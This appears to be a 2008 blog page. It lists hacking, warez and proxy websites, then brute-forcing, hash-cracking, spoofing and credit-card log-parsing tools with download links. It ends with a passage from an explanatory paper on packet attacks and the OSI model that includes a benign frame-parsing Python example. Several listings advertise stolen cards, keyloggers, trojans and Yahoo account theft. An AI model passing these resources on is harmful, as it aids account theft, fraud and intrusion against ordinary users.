
Millions of hacking websites  

Monday, February 11, 2008

http://www.blackcode.com/
Code:
http://g0t-root.org/
G0t-Root.Net
G0t-Root.net Best for undetectable toolz, CC's, Paypals, Exploits, All is very welcome, Learn to hack, code, use exploits and much more join now and share your hacking knowledge, Services: G0t-Root Forum, G0t-Filez Upload Filez, G0t-Crack Crack your hashes, G0t-Paste Paste Code
---------------------------------

Code:
http://www.suck-o.com/
suck-o.com
Hacking/Coding/Web Development - Friendly forums and a huge high quality download section with no dead links. If you are annoyed by crappy sites plastered with ads and no useful content then join our knowledge-pool...we're independent and non-commercial. Receive help on the boards and have fun with our wargames. -new server based wargames are about to come up-
------------------------------------

Code:
http://www.hackerscenter.com/
Hackers Center - All the tools you need
The best resource for hackers and crackers: tons of tools, tutorials, free books, papers, exploits and now HSC ethical hacker course, hacking videos. Updated twice a day
--------------------------------------



Code:
http://www.plundered.org/all/page1.htm
Downloads - Plundered
Hi-speed collection of mp3s, software etc, come have a browse.
-----------------------------

Code:
http://73379.rapidforum.com/
Pirates Forum
MULTI forum for all you lonely PIRATES ON THE NET looking FOR FREE SEX Members Area by hacking password and user. Super movies and special movies from the hacked sites also. BY hacking cracking tools, free programs, you've found the right place: Passwords are being checked in realtime, no dead passwords. Learn to Crack and BE a Power Pirate. Hacker/Cracker Area, Hackers Crackers AREA, Hacking/Cracking Security General Tools by BIG-SELDOM-COLLECTION ARE IN THIS AREA: Cracking Full Tools, Exploits, Hacks, Cheats, Keyloggers and Sniffers, Mail-Bombers, Nukers, Scanners, Security Holes, Word Lists, Warez, Viruses, Trojans, Webkiller 3.4.5, and FireWebkiller by Russia .. etc. If you want to join our site you must give a valid reason, no blank applicants will be accepted. All blank applicants will be deleted. No exception. AND if the majority thinks you're being a pain in the neck then the majority rules. If you ignore the rules, you will be CANCELED. Be cool, y'all. Follow.... We accept only TRUSTED MEMBERS. Don't be late... Enjoy our Forum, Pirates.
-------------------------

Code:
http://72.39.104.185/
Anpcorps l The Next generation
The best hacking experience all in one site with tons of downloads. Anpcorps is the place to be looking for hacking tools.
--------------------------

Code:
http://www.final4ever.com/
Welcome to the Final4Ever Forums: computer, security, network, hack, crack, free, software, warez, serial, program, download, mp3 etc., to the world of wireless. While this technology is constantly growing, it is replacing the traditional wired world that we live in.
--------------------------------------

Code:
http://www.downloadwarez.org/
--- CRACKSKEYGENSSERIALS ---
Free FULL Downloads Cracks, Keygens, Serials, Appz, Gamez, Moviez, Music Popup Advert-Free
-------------------------------

Code:
http://forum.x-access.biz/
X-ACCESS
Best Passes, Spoofs, BackD00rs, Passfil3s, Warez, Mp3, Movies, Pictures, Art, etc. For those who like to share and like to have feedback for their work. Pass WeAreBack
--------------------------------

Code:
http://www.i-hacked.com/
I-Hacked.com Taking Advantage of Technology
Electronics are everywhere, and technology drives pretty much everything we do in today's world. We show you how to take advantage of these electronics to make them faster, give them added features, or to do things they were never intended to do. We are not a cracking site, we are hackers. Our inquisitive nature leads us to find ways of making technology work for us. We do not support unauthorized access into systems, breaking into email systems, or anything of that nature. Please do not email me asking me how to do this type of stuff.
--------------------------------------

Code:
http://www.hackers-realm.org/
Hackers..Realm..
Hackersrealm portal and community for hackers tools, booters, Yahoo tools, viruses, tutorials, rootkits, binders, brute forcers, crackers, mail bombers, keyloggers, scanners, DoS and DDoS tools, trojans, passlists, exploits.
-------------------------

Code:
http://www.titsecurity.com/
TiTHacK TiTSecurity Microsoft HacKers.
Microsoft France hacker. Web hack, web security. Mail hack and web server security. Latest XSSes. Web hack and web hack security. New XSS, new bug, deface. DotNetNuke NEW bug first in here. DotNetNuke hacker, DotNetNuke all exploits in here.
--------------------------------------

Code:
http://www.yahooboots.com/index.php
..-www.Yahoo Boots .com-..YTunnel_BOOTS
It's what the site name is. We have the largest archive of boots and yahoo related progies.
----------------------------------

Code:
http://rapidforums.net/
DDL Full WAREZ Rapid Forums
DDL, Warez, Apps, Games, TV, Movies, HD, Ebooks, Roms/Emulators and more.
------------------------------

Code:
http://www.megasecurity.org/Main.html
MegaSecurity
Latest Security News, Trojan alerts, Vulnerabilities, Exploits, DDOS, Firewalls and much more
-------------------------------

Code:
http://forum.security-shell.com/
Security Shell
Security Information, Security News, Security and Hack Tools, Tutorials, Video and much more
--------------------------

Code:
http://www.elitec0ders.net/
Elitec0ders.Net -Keyloggers-Bakdoors- IE-Exploiter
Firewall bypassing keyloggers,backdoors,webdownloaders,IE Exploit creator and more tools ..
------------------------------

Code:
http://how2hack-security.net/
How2Hack Security Group
Here you will find tons of tutorials, downloads, challenges, and places to try your hacking skills. This is a huge portal for people to learn how to hack passwords, web sites, etc.
-------------------------------------

Code:
http://www.proxy-listen.de/
Really Fresh Proxylists - updated nonstop
Site offers free access to the minutely updated database of HTTP/HTTPS proxies via flexible user interface allowing selection of proxy properties like its type, connection latency, etc. Check your Proxies with our fast Proxychecker. Free online Proxy.
-------------------------------

Code:
http://www.blastproxy.com/
www.BLASTProxy.com
1 Rated Anonymous Proxy. Browse the web completely anonymously, access restricted sites from work or school. Hosted on a Fast OC-3 USA server.
-----------------------------

Code:
http://www.bestdown.com/
BOOKWAREZ HOME
EbookZ,ComponentZ,CertificateZ,CodeZ
----------------------------------

Code:
http://www.hackr.org/
hackr.org - Learn To Hack
Hacking challenges, discussions, and much more. If you want to learn more about hacking, this is the place to be.
-------------------------------------

Code:
http://www.governmentsecurity.org/
GSO The Largest Hacking Exploit Security Forum
Enjoy forum discussions on the latest exploits and security topics, with downloads. An extremely active board with an active IRC channel for chat. Join the hundreds who are actively participating right now.
-------------------------------

Code:
http://www.v60-hackers.org/
- v60-hackers -
v60-hackers is a forum if you want to share knowledge, code and ideas. We do not want spamming, flaming or any other type of half-brain ideas here. We want to help you learn, or you help us; we don't care as long as this community can help. We have d0wnl0ads, ebooks, tuts, a forum. We don't really mind about VIP, just show us you are not a script kiddie and help us to fill the VIP sections. So if you're still reading this please join us, we don't bite. We also have a small but growing useful downloads section, including warez and serial codes.
------------------------------------------------

Code:
http://breadsdownloads.forumcircle.com/index.php
BT Downloads
Need a download? We got them here. Get movies, music, programs, games, cracks, keygens, and much more. Got a computer problem? Maybe we can help with our BTDownloads help team.
-------------------------------------------------

Code:
http://www.oscrew.com/main/news.php
Old Skool Crew
We have hacking tools, tutorials, video tutorials, brute forcers, generators, worms, viruses, come visit us
-------------------------------
Code:
http://www.knbykl.org/
KnbykL They 1 Legend
Professional security page
-------------------------------
Code:
http://www.publicwebproxies.com/
Public Web Proxies
Public Web Proxies provides you with a wide range of information about proxy servers, CGI proxy and anonymous surfing
---------------------------------------------------

Code:
http://www.hackershomepage.com/
Hackers Home Page
Comprehensive on-line catalog designed for the serious hacker, phreaker, cracker, casino cheater, dss and cable tv user, spy, financial hacker, and electronics enthusiast.
--------------------------------------------------------------

Code:
http://unkn0wn.eu/
uNkn0wn.eu - Security board.
uNkn0wn.eu - Security board since 2006 - get help about everything you need - daily updated with the best rises from the brains of our members - fresh Packers - Crypters - Protectors -over 100- - Related sources - RATs - BOTs - Proxies, socks - etc.. - enjoy getting now what you always dreamed to get - feel free to check out our board and register - we're sure you won't repent it.
--------------------------------------------------

Code:
http://www.k0h.org/portal/
k0h.org
In this forum, you can find a lot of information about hacking, programming, operating systems, gaming, and a lot more ...
-----------------------------------------------------------

Code:
http://www.woltran.com/
www.woltran.com
Security/Hacking/Coding/Web Development - Friendly forums and a huge high quality download section, no dead links. If you are annoyed by crappy sites plastered with ads and no useful content then join our knowledge-pool...we're independent and non-commercial. Receive help on our boards and have fun with our upcoming wargames.
---------------------------------------------------------------------

Code:
http://www.locohacker.net/
Paltalk Cracks Hacks Tweaks
Paltalk Cracks hacks Programs, Tweaks, Exploits, Internet security, VB Codes
------------------------------------------------

Code:
http://darkyahoo.com/
DarkYahoo Welcome to YAHELL
The best booters, antis and YTools on the planet
-----------------------------------------
Code:
http://www.sacred-hacks.net/
Sacred-Hacks
hacking tutorials, security, trojans, viruses, help, and more. All is Popup free for life.
--------------------------------------------------

Code:
http://www.proxy-list.net/fresh-proxy-lists.shtml
Proxy List Net
Free proxy lists and an automated proxy checker.
--------------------------------------------------

Code:
http://www.freshproxy.com/
Fresh Proxy Lists - Update Evry Day
You can find free proxy lists, anonymous and elite. Socks proxies too. You can choose from the forum, and fast speed.
-----------------------------------------------

Code:
http://www.lame-warez.com/
www.Lame-Warez.com
No.1 site for your cracker, booter and lots of crack tools. Don't u want to hack a Yahoo ID? I know u want to, so don't waste time, come and download all the programs which are needed to steal a Yahoo account. No annoying registration needed and site updated every day with new downloads. With 24/7 Forum support. I can guarantee you will never leave this site. If you don't visit this site and don't read our documents, then u are missing the most important part of hacking, as this is the only site that has all the details on how to hack a Yahoo ID and that really works.
-----------------------------------------------

Code:
http://www.chatboots.com/
_-_-_www.ChatBoots.com_-_-_
Chat Boots .com AIM Yahoo MSN ICQ more - Downloads Programs for all the messengers - Tools Help Tweaks Crackers Blockers - and more -100 FREE
----------------------------------------------

Code:
http://www.ethicalhacker.net/
Ethical Hacker Network
This free online magazine for the professional pen tester is the home of the Skillz Hack1ng Challenge hosted by Ed Skoudis and Free Monthly Giveaways where 1000s of dollars in prizes have been awarded to top contributors. Calendar of hacker and security cons, forums, tutorials, how-tos, tools, certs, regular columnists and more.
-------------------------------------------------------

Code:
http://hacking.3xforum.ro/
Hacking DataBase
So... you want to be a hacker, huh? This is a state of mind.

------------------------------------------------

Code:
http://hack.startkabel.nl/
Hackers Portal
All links to hackers utilities on the web, including phreaking, hacking security, filez, progs, warez etc.
----------------------------------------------

Code:
http://darkcode.ath.cx/
The Darkcode of Python
/// FORUM NEW Help Us Grow /// databases, scanners, encryption, irc-bots, google dorks, miscellaneous, others, etc. Where the python bytes back
--------------------------------------------------

Code:
http://www.proxz.com/
Proxz.com - free proxy servers
Free proxy servers here. Large forum community with daily updated proxies.
----------------------------------------

Code:
http://www.xroxy.com/
Xroxy Proxies
More than just proxy. Proxy lists of different kinds. Xorum proxy message board. CGI web proxy service with SSL support.
---------------------------------------

Code:
http://www.xhax.2ya.com/
HaX
HaX the next generation of security has arrived and lives here. Join the ever growing community.
------------------------------------------

Code:
http://www.hackers-black-book.com/
.-.-Hackers-Black-Book-.-.__Learn2Hack
Just another hacking site with tutorials.. We also have a feature on The Mentor. And one of his original untouched tutorial from back in the days.
------------------------------------

Code:
http://www.elitehackers.info/
EliteHackers.Info
Hacking Related Information
----------------------------------------

Code:
http://www.flyninja.net/
Flyninja.net - Underground Search
Flyninja.net - Find what you're looking for using our Underground Search: hacking, cracking, phreaking, anarchy and tools search engine. Also categorized directories to help you with your searching - HUGE FILE LIST GET JITKO
----------------------------------------

Code:
http://www.yahoo-owned.net/
Yahoo-Owned
Yahoo Booters, Crackers, Tools. and great VIP area with more porn and software than you could ever stuff into that hard drive
------------------------------------------

Code:
http://www.usbhacks.com/
USB Hacks
Dedicated to endpoint insecurity
------------------------------

Code:
http://rstzone.org/
Romanian Hackers Zone
RST Romanian Security Team Ethical Hacking - Site dedicated to web application security where you can find articles, text and video tutorials, bug reports (reports of vulnerable sites), a cookie logger (system for logging cookies), a discussion forum and much more.
--------------------------------

Code:
http://www.hackits.de/
www.hackits.de
...Now V3.0 released with more than 17000 members. At the moment you have 5 level-based challenges with up to 10 levels each. Scores, ranks, statistics, forum and chat. Tutorials in German and English. Also over 150 non-level-based challenges, with more added weekly. Our forum is well moderated and in our chat you will also find a helpbot for the challenges, or just talk to others. ...
--------------------------------------

Code:
http://www.elite-hackers-site.com/
The Elite Hackers Site
This is the ultimate resource for all of your hacking needs. This is the only site on the web that will invite newbies in, and not let them leave, not until they're elite, anyway. From basic tutorials and setups, to remote protocols, strategies, viruses, and much more, we have everything you need to become one of the elite. All you need is to be 15 and have an open mind.
---------------------------------------

Code:
http://www.foxyproxy.net/index.html
FoxyProxy
Visit filtered/blocked/disallowed sites, all from the safety of your browser.
--------------------------------------

Code:
http://crack.overzichten.net/
Crack Overzichten
Lots of links to hacking, cracking and security site.
----------------------------------------

Code:
http://www.t3rr0r-inc.com/
..T3RR0R-Inc..
t3rr0r-inc.com features an elite downloads database packed with various resources including : hacking utilities, computer warez and security, media, graphics, webdesign, programming and resource, yahoo related warez and many other misc. utilities.
----------------------------------------

Code:
http://www.hackercity.us/
HackerCity.Us - Living Legend Turkish Hackers
HackerCity.Us - World Hacker Center - Security and hacking Portal
----------------------------------------

Code:
http://unlimitedwarez.us/index.php
UnlimitedWarez
Warez and cracks forum
----------------------------------------------

Code:
http://www.eliteforcescripts.com/
Elite Force Scripts
For All Your Digi Chat Exploiting Needs.
-----------------------------------------

Code:
http://www.enigmagroup.org/
EnigmaGroup
We are a non-profit hacking organization here to provide you a safe and legal place to hack and learn some basics in hacking. We have many different challenges for you to test your acquired skills, or learn new ones along the way. Don't forget to visit the forums, and read all the articles you can, and feel free to post a few articles yourself. New ideas are submitted and reviewed on a daily basis, so suggest all you want to. Register, and join the group today.
--------------------------------------

Code:
http://3rror.info/
3rr0r
3rr0r's security site: exploits, tutorials, programming. Also has the domain 1337357.org.
-------------------------------------------

Code:
http://szenelinks.eu/
SzeneLinks
The name says it all.
-----------------------------

Code:
http://www.leetupload.com/
leetupload.com
A Hacker's Database that consists of 'hacking' files, security papers, tutorials, videos, and anything else security or penetration related. The main point of this site is to create one central site that has files that are either no longer being hosted anywhere else, or are difficult to find. To help keep the database up to date, anyone can upload security related files, and once reviewed, they will be added to the database. Now with n00b friendly forums too
----------------------------------

Code:
http://www.zeroidentity.org/home
Zero Identity
Zero Identity is a web security training website, a community for hackers and more. We have video tutorials, articles, forums, user blogs, challenges, web tools and more Come give us a visit and learn to secure yourself today.
-----------------------------------------------

Code:
http://gohack.org/
gohack
GoHack.org is a fresh website for you new and experienced hackers looking for a community to share and test your knowledge on a wide range of challenges.
-------------------------------------------

Code:
http://www.proxy1080.com/
Proxy1080
Proxy1080 is a free web proxy service that allows web surfing unblocked from many restrictive firewalls.
---------------------------------------

Code:
http://www.uplinklounge.com/
UplinkLounge Feed your inner hacker
UplinkLounge is a haven for free thinkers, artists, hackers, and free spirits. We hope to provide a strong community for sharing information and ideas amongst like minds.
---------------------------------------------------

Code:
http://wethepeople.ms/?tid=7
Wethepeople
German Link Site
------------------------------------

Code:
http://www.securedeath.com/
Secure Death d0t com
If you didn't hack your system, who will do it? Security is our right. Hacking is our left.


Some are nice sites while some are useless.


Different Tools To Hack  

Sunday, February 10, 2008

Bruteforcing Programs

Accessdiver (AD) by Jean Fages
http://www.accessdiver.com

Sentry by Sentinel
http://sentinel.deny.de/sentry.php

Goldeneye by Madmax
http://madmax.securibox.net/products/goldeneye/goldeneye.htm

Form@ (specifically for FORM sites) by SSS
http://sss.deny.de/

httpbugger by Ken78x (specifically for form sites and HTTPS form sites)
http://ken78x.securibox.net/

Caecus by Sentinel (for form sites that require an OCR [t4wsentry.pl])
http://sentinel.deny.de/Caecus.php

Ares by Gamoaa
http://www.xisp.org/downloads/FACE_Setup.zip

Brutus
http://www.hoobie.net/brutus/

AuthForce by Zachary P. Landau
http://kapheine.hypa.net/authforce/index.html

Entry by Sparkleware
http://www.sparkleware.com/entry/index.html

Xavior by LithiumSoft
http://www.btinternet.com/%7Elithiumsoft/Products.html

Web Password Checker (WPC) .1 for UNIX by g1soft
http://www.securityfocus.com/tools/885/scoreit

Munga Bunga's HTTP Brute Forcer by Munga Bunga
http://www.hackology.com

Wordlist Tools

Raptor 3 by Madmax
http://madmax.securibox.net/products/raptor/raptor.htm

Staph by Ashes
available at securibox.net under "downloads"

Words Extractor
http://www.intellitamper.com/wordsextractor/

Parsley by on_a_role_again
http://www.geocities.com/parsley_home/

Lucifer by Rhino
http://rhino.deny.de/lucifer.php

ALS_novice by Wolfman
http://wolfman.deny.de/tools.html

Combomania by Gamoaa
available at securibox.net under "downloads"

Z-leecher by Beda
http://goldmaster.webpark.cz/sleech.html

S-Generator by Beda
http://goldmaster.webpark.cz/sgen.html

S-WordlistTool by Beda
http://goldmaster.webpark.cz/swordt.html

Proxy Tools

Decrypting Tools

John The Ripper (JTR)
http://www.openwall.com/john/

MDcrack (MD5 Cracker)
http://membres.lycos.fr/mdcrack/

Passwords Pro (MD5/MD4/Pass Generator)
http://www.insidepro.com/eng/passwordspro.shtml

RainbowCrack Hash Cracker
http://www.antsight.com/zsl/rainbowcrack/

Distributed John The Ripper by Luis Parravicini
http://ktulu.com.ar/en/djohn.php

Cain and Abel by Massimiliano Montoro
http://www.oxid.it/cain.html

Salt Grinder by Wolfman
http://wolfman.deny.de/SaltGrinder.php

Log Tools

LogRip by Rhino
http://rhino.deny.de/logrip.php

Azarius by Rhino
http://rhino.deny.de/azarius.php

Zimapass Parser by Sentinel
http://sentinel.deny.de/zimaparser.htm

C-Parse (ccbill.log parser) by Sentinel
http://sentinel.deny.de/c_parse.htm

CCBill USI (CCBill log parser that removes all dead accounts PRIOR to decrypting)
http://membres.lycos.fr/ccbill/

Accessdiver/Ares Parser by Sentinel
http://sentinel.deny.de/ad_ares_parser.htm

Spoofers

Zspoof by Wolfman
http://wolfman.deny.de/tools.html

Sploof by Jean Fages
http://www.accessdiver.com/sploof.htm

Final Spoof
http://www.beatharness.com/finalspoof/

Spooph by nast0
http://24.106.100.133/spooph/index.html

D-Spoof and others (Russian site, English programs)
http://mspoofer.pisem.net/zaza/index.htm

MVSLite by Mentor
http://mvs.freehosting.net/index.html

Mikho's Online Spoofer (web-based spoofer, choose "open" when the dialog appears)
http://www.mikhosoft.com/spoofs/

QuickSpoof
http://httpd.chello.nl/%7Em-koster2/spoofs.htm


PACKET ATTACKS - VERSION 1.1  


Let me start by saying the internet is full of wonderful tools and papers like this one. A lot of these things can help you
increase your knowledge, perhaps your job or more. But just as easily as you can learn from them, people read into them too
much and decide to harm other people's work for no apparent reason. Let it be known that is in no way the purpose of this
paper. A true hacker is one who strives to attain the answers for themselves through curiosity. It's the path we take to
those answers that makes us hackers, not destruction of other people's work. So with that said, please enjoy my work, as I
have enjoyed writing it.

The flow of data has always captured my interest. Just how does it work, how can we dissect it and use it to our advantage?
Well, I have spent a long time studying all of this, and that is why I wrote this paper. It's a collection of run-on
sentences on different packet attacks and how they work. Now we all know you can learn all you ever wanted to know about the
specifications of a protocol by reading its 30-page RFC document. But that is the protocol according to design; in the wild
it's a different story altogether. 'Packet Attacks' covers everything from basic DoS attacks to TCP/IP hijacking, hence the
name "Packet Attacks". This paper also focuses not just on attacks but on practical ways to prevent such attacks and ideas on
new methods to help us stop them and secure our networks.


Introduction:
TCP/IP Packet Switching Networks
OSI MODEL


---Chapter 1.---
Section a.
Introduction to DDOS/DOS & Packet Attacks
Section b.
How attacks are crafted

---Chapter 2.---
Section a. (attacks)
ICMP
Smurf
SYN/ACK
UDP
DNS
ARP
DrDOS
Special Bot / Trojans
Worm DOS
Unicode ping flood (new!)
Section b.
Phasing
Section c. (hacks)
TCP hijacking
Sniffing
Scans
Information gathering / Footprinting
Section d.
Defense against these attacks
Attack Detection
Intrusion Detection
Section e.
IPSEC
NAT as a means of security

---Chapter 3.---
Section a.
The future of TCP/IP as a means of using IPv6

---Chapter 4. ---
Section a.
New security application / protocol

-----
Introduction.

Well, I assume most of you reading this paper already have a good understanding of TCP/IP and how it works, so I won't get too
much into detail on that, but I will scrape the surface on the parts we NEED to discuss. The internet is a MASSIVE web of
machines all connected to one another through a series of hardware devices known as routers, switches, hubs, bridges and
lots more. All of these devices (although some are smarter than others) push along packets. Our operating systems and
applications craft these packets in order to send data to one another over the wire. Each packet, although varying in size,
carries a small bit of data from one host to another. Each packet must also carry its own personal information, such
as where it came from and where it's headed. Of course there is a lot more to a packet than just this information, but as far
as attacks go this is the crucial information we need to look at. Now there are many, many different types of protocols that
craft many different types of packets, and they are all read differently when they are received at the other end. Whereas
an ARP packet may tell a host who has this MAC address on this subnet, a TCP packet might transfer the last few bits of that
MP3 you're downloading. Regardless of the data, all of these packets use the same wire to move to and from locations. I couldn't
possibly discuss every protocol and packet structure in this one paper. The average end user takes for granted all of this
running in the background while they surf the net. Most people don't understand the complexity of this internet we are all so
familiar with, the chat rooms etc. But there are people who do, and there are people who take advantage of that. Reverse
engineering has led to the creation of attacks using the basic fundamentals these protocols rely on. And since TCP/IP is so
embedded in our infrastructure, we must adapt and learn to defend against each new attack.

OSI MODEL

The Open Systems Interconnection model is a seven-layered networking design. It's an industry standard that defines exactly how
data is transferred from protocol to protocol. Not every protocol follows the OSI model exactly, though some do. TCP, the
internet's main mode of data transport, does not follow it exactly. Let me take you through a brief overview of the OSI model.

Layer Seven : Application Layer
This layer is obviously application specific; it provides everything from authentication to email to FTP and telnet, the
list goes on. It's specifically for end-user processes: what we input into our applications, we can see on our screens.

Layer Six : Presentation Layer
This layer changes and possibly encrypts the data so that the application layer can understand it. (You will understand what
this means in a few minutes.)

Layer Five : Session Layer
Think of this layer as the establishment, control and termination of the sessions formed by the application (client) to a
remote host (server).

Layer Four : Transport Layer
This layer is responsible for the invisible transfer of data from host to host. It is there to ensure all data transfer
goes accordingly. The protocols used are UDP and TCP.

Layer Three : Network Layer
This layer is for error correction, packet sequencing, and for transmitting data from node to node. Addressing is also
another function of this layer in inter-networking.

Layer Two : Data Link Layer
This layer decodes and encodes packets into bits so they are ready for the physical layer. It also handles error correction
in the physical layer. This layer is also divided into two different sub-layers: the LLC (logical link control) and MAC
(media access control) sub-layers. The LLC sub-layer provides control for frame synchronization and error checking. The MAC
sub-layer controls how a computer on your network has access to data.

Layer One : Physical Layer
This layer is the actual movement of the data. Using electrical impulses or some other form of data movement, it pushes the
bit stream towards the other host. This layer is the hardware level: the ethernet card, the wire etc. There are many
protocols within this layer.

You may ask yourself why I listed these from 7 to 1. Well, I did so to show you how the OSI model really works. Layer Seven
really comes first: the end user types something into his instant messenger (for example) and the data flows down through
the OSI model, being encapsulated and changed at every level where it has to be changed or corrected. The data travels the wire
and at the other end it moves back up the OSI model all the way to layer seven, where the other host can read it in
the original form it was sent. So there's a VERY basic understanding of the OSI model and how it works to transmit data from
host to host. There are a lot more protocols and parts to the OSI model, but this basic representation should provide a firm
understanding.
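To make the down-and-back-up walk concrete, here is an added Python example (not part of the original paper): it wraps a payload in TCP, IPv4 and Ethernet headers in turn (layers 4, 3, 2), then parses the frame back up one layer at a time, verifying the IPv4 header checksum on the way and rejecting a frame whose header was corrupted in transit. The MAC and IP addresses, ports and sequence numbers are constructed placeholders.

```python
import socket
import struct

# Constructed sample link-layer addresses; locally administered MACs, not real hosts.
SRC_MAC = bytes.fromhex("021122334455")
DST_MAC = bytes.fromhex("02aabbccddee")
ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6
ETH_HDR = "!6s6sH"          # layer 2: dst MAC, src MAC, EtherType (14 bytes)
IP_HDR = "!BBHHHBBH4s4s"    # layer 3: minimal 20-byte IPv4 header
TCP_HDR = "!HHIIBBHHH"      # layer 4: minimal 20-byte TCP header


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 header checksum: one's complement of the one's-complement sum of 16-bit words.
    Run over a header whose checksum field is already filled in, it returns 0 if the header is intact."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                      # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def encapsulate(payload: bytes, src_ip: str, dst_ip: str, src_port: int, dst_port: int) -> bytes:
    """Walk application data DOWN the stack: wrap it in TCP, then IPv4, then Ethernet."""
    # Layer 4: TCP header. Sequence/ack numbers and window are constructed values; data offset is
    # 5 words, flags PSH|ACK. The TCP checksum is left 0 to keep the example focused on the IP layer.
    tcp = struct.pack(TCP_HDR, src_port, dst_port, 1000, 2000, 5 << 4, 0x18, 65535, 0, 0) + payload
    # Layer 3: IPv4 header built with checksum 0, then the computed checksum patched into bytes 10-11.
    ip = struct.pack(IP_HDR, 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, PROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]
    # Layer 2: Ethernet header in front of everything.
    return struct.pack(ETH_HDR, DST_MAC, SRC_MAC, ETHERTYPE_IPV4) + ip + tcp


def decapsulate(frame: bytes) -> dict:
    """Walk a frame back UP the stack, peeling one header per layer and checking what each layer
    lets us check. Raises ValueError on anything that would make a real stack drop the frame."""
    if len(frame) < 14 + 20 + 20:
        raise ValueError("frame too short")
    # Layer 2: the EtherType tells us which layer-3 parser to hand the rest to.
    dst_mac, src_mac, ethertype = struct.unpack(ETH_HDR, frame[:14])
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame: 0x%04x" % ethertype)
    # Layer 3: the IHL field gives the real header length; verify the header before trusting it.
    ver_ihl = frame[14]
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(frame) < 14 + ihl:
        raise ValueError("bad IPv4 version/header length")
    ip_hdr = frame[14:14 + ihl]
    if ipv4_checksum(ip_hdr) != 0:
        raise ValueError("IPv4 header checksum mismatch")
    _, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack(IP_HDR, ip_hdr[:20])
    if proto != PROTO_TCP or total_len > len(frame) - 14:
        raise ValueError("unexpected protocol or truncated datagram")
    segment = frame[14 + ihl:14 + total_len]
    # Layer 4: the TCP data offset (in 32-bit words) locates the application payload.
    src_port, dst_port, seq, _, off, flags, _, _, _ = struct.unpack(TCP_HDR, segment[:20])
    data_off = (off >> 4) * 4
    if data_off < 20 or data_off > len(segment):
        raise ValueError("bad TCP data offset")
    return {
        "src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
        "src_ip": socket.inet_ntoa(src), "dst_ip": socket.inet_ntoa(dst), "ttl": ttl,
        "src_port": src_port, "dst_port": dst_port, "seq": seq, "flags": flags,
        "payload": segment[data_off:],
    }


def corrupt_ttl(frame: bytes) -> bytes:
    """Flip one bit in the IPv4 TTL (byte 8 of the IP header) to show the layer-3 check catching it."""
    buf = bytearray(frame)
    buf[14 + 8] ^= 0x01
    return bytes(buf)


if __name__ == "__main__":
    frame = encapsulate(b"hello world", "10.0.0.1", "10.0.0.2", 40000, 80)
    print("frame bytes:", len(frame), "(14 Ethernet + 20 IPv4 + 20 TCP + 11 payload)")
    for key, value in decapsulate(frame).items():
        print("%-9s %r" % (key, value))
    try:
        decapsulate(corrupt_ttl(frame))
    except ValueError as err:
        print("corrupted frame rejected:", err)
```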

To understand all of this more in depth, please get your hands on a few RFC (Request for Comments) documents and start reading,
because it will take you a very long time to understand exactly how TCP/IP works. If you're very knowledgeable in the way
TCP/IP works then this paper should make a lot of sense to you, perhaps even bore you! :( On the other hand, if you don't
understand TCP/IP as well as you would like to, you still might get something out of this. I try to explain all of the
technical writing as easily as I can. Feel free to email me if you have a question or comment. Thanks :)
Data_Clast

---------------------------------------------------------------------------------------
Chapter 1.

Section a.

The most common attack on the internet today is a denial of service attack. There are many programs on the internet today
that will assist anyone in crafting one of these attacks. The sad part is that, for as easy as they are to make, their power
can be destructive when used properly. No matter what kind of packet attack it may be, most are based on the same principle:
volume. Thousands and thousands of spoofed packets will eat up network resources within minutes, choking and essentially
'killing' any network. There are many types of packet attacks. Some are more sophisticated than others. I will also talk about
TCP/IP hijacking and your typical port and vulnerability scans, among other things.

Why do people launch these attacks? How are they launched? How exactly (technically speaking) do they 'choke a network'?!
Hold tight, I'm getting to that. The lower end of these attacks are usually launched by what the hacker community calls a
script kiddie. You see, a hacker isn't a mindless web-defacing juvenile (please see the Mentor's manifesto). A hacker is a
person of true intellect and would never craft such an attack for no reason. But these lower-end attacks are usually
launched at people's individual machines. Their IP addresses may come from an IRC chat room, Yahoo Messenger, AOL, ICQ, or
whatever other messenger you might use. Although not as sophisticated, these 'lower-end' attacks can still knock an
individual machine offline in minutes. The slightly more advanced attacks may be aimed at a business competitor in order to
slow their sales or disrupt their outgoing internet connection. Whatever the reason may be, they are usually launched for a
reason. Attacking a box for no reason is typically useless and will only take up your own bandwidth.

The more sophisticated attacks are aimed at government and root points of the internet, such as the attacks on the root DNS
servers in October of 2002. These attacks were sophisticated in the way they were crafted. The attacks lasted for over an
hour and successfully took out a few of the servers. If the attack had lasted just a few more minutes, who knows the damage
it could have caused. The possibility of the authorities solving these attacks and apprehending the offenders is slim to
none because they are created and launched by skilled malicious individuals. They were also distributed denial of service
attacks, which means the 'zombie' machines that attacked the servers were spread out all over the world. We will touch more
on that later though.

Section b.

You will learn more about how these individual attacks are crafted and how they work later in this paper, but this is a
small introduction so you can get a vague idea. Creating spoofed packets requires an open socket. This socket binds to an
IP and a port and allows you to inject a packet onto the wire or accept any incoming packets to that IP and port. *NIX
openly supports open socket programming (there are many tutorials on this type of programming), which means you can code
programs that create packets and then inject them into the network with ease. An example of this would be a program called
"SENDIP" which allows you to create custom packets, and it supports many protocols (another good program is nemesis). I
have written a few tutorials using SENDIP; I think it's a great program for both advanced and new network engineers to use.
It will help you learn about packet structure and the different protocols it supports. Microsoft is not an open source
company, which pretty much makes it even harder to find help in creating these sorts of programs for Windows. But it is
possible to craft these attacks from within a Windows environment; it's referred to as 'Winsock' programming. In fact most
of these DDOS attacks are because of vulnerable Windows boxes out on the net. They are sitting ducks for trojan horses and
other programs that craft these attacks on servers when commanded from a client program to do so. Most end users do not
understand security and how easy it is to break into someone's home computer, so they lack firewalls and virus scanners.
This leads to many zombie machines available at hackers' disposal on the net. All one has to do is scan a class C subnet
for open trojan ports and hack their way into those trojans and use them as a backdoor; another zombie is created for
attacking remote targets. Almost every program that interacts with TCP/IP generates packets to and from places; this is
valid traffic. As you read you will distinguish the difference between valid and non-valid, as it is pretty easy to
